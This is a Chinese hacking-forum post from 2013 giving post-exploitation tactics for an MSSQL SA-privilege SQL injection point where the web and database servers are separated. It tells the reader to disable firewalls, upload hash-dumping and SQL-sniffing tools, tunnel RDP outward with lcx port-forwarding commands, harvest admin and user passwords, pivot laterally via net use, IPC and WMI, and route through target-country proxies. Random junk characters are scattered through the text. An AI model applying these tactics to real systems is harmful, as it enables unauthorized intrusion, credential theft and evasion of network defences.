当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。/ ^2 C/ D+ |# q
9 ]5 f* I1 ^# f% ^* \# v* [ C
) @' S& f3 ]* j' y9 f2 g
6 M, y6 E# ], Z% V$ oSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出), n/ @3 |9 e! e" \# Z" ?# H) J
( f5 q; b; j' d( f8 _
# \1 @/ @7 f; B9 Z! O' x h一、DB机有公网IP.
% l! X/ W5 v; T1 T8 O
/ {; _( ]. P# W: q& B& e! N4 }1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.) ]( V2 d4 w! Z8 z" X
: L6 g% _4 C* e- ?% u
8 {3 `4 f# m6 R; ^/ ~! o% \2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.: n- N9 h' V& k2 J) w) i
; i1 D, G2 U6 ^0 U
9 ?0 {. [% @0 A% m3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
( y. T, S; z" H4 [ n( L* j6 A. Z
: G2 J, c0 s/ \% p7 l7 k8 X
1 B: b3 T k/ s3 A$ B4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
* p5 {" o/ F4 l1 d# t; L' t- Z
/ q$ Z, F2 h; t+ q
6 p9 m4 G" U. v& r: P1 N2 b二、DB机只有内网IP* g# Z& p& i& E3 G( X
7 E& p1 W5 \% I1 q9 g1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.& `9 {2 O! n# S# t, ^/ c
w+ d" ^0 K# o+ }! @9 R6 i
6 o+ l+ R9 s! c% |& K9 R
2:停掉防火墙和IP策略再从内往外扫描.# j |+ ?4 q- n- \$ N
0 g, X4 w2 A, _) c, ^( m0 D! {
' [) R* A" X0 J! \8 J/ x& [3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
, h' R& B0 x1 ]' X- S; ]6 r! u# F) [* o, q! y, W) d2 q, a
7 B# |, \7 L/ c: q% @( i4:学会密码规律分析往往会有惊喜.5 ~1 j' ]! B/ q
' A! }1 d2 H5 Q0 ]- R3 J1 Y( S
@2 y1 s6 X4 M$ V8 K1 o" y. Z3 i5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等5 k- |: |3 {( S) B
- E; U/ ~& l1 X/ u7 M O1 ^
' z- x. E9 C5 ~" |8 d有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对